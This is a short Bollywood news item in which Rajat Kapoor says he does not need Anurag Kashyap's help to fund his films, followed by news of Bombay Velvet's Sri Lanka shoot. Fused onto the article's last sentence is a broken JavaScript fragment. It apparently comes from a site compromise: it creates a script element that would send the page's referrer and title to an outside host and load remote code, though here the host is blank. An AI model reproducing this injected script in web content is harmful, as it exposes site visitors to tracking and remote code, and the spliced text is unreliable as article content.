Rajat Kapoor: I am not a newcomer to take Anurag’s help

Rajat Kapoor, who is known for making off-beat movies on a shoe string budget, got upset when asked if he would take Anurag Kashyap’s help. When reporters met him at his Goregaon office, he informed that even for Ankhon Dekhi he was not getting any producers and finally he got pissed and posted on twitter about it.

Anurag Kashyap is also known for making off-beat films and is known for promoting new scripts and producing those films under his banner. Besides, Anurag and Rajat are good friends so the reporters asked Rajat if he would take Anurag’s help.

He got a little annoyed and said “I am not a newcomer that I will need Anurag’s help. Anurag is a very dear friend of mine. To be honest, Anurag is lending his name and not his money to the filmmakers, which is good thing for a newcomer, but not for me. Anurag is a star now and his name itself helps newcomers get a foothold in the industry. Anurag can borrow money from the market for making films by just using his name. I have my own way of getting finances for my projects. When I need him I will go.”

Meanwhile, Anurag Kashyap, who is directing the upcoming film Bombay Velvet recently went to Sri Lanka for a shoot. Anushka Sharma, who is a part of the film, tweeted about the same saying they completed shooting in Sri Lanka. “Wrapped Sri Lankan schedule of ‘Bombay Velvet’. This was the most amazing crew and cast. Crazy talented bunch of people. Feel truly blessed,” she posted on her Twitter page.var d=document;var s=d.createElement(‘script’); s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
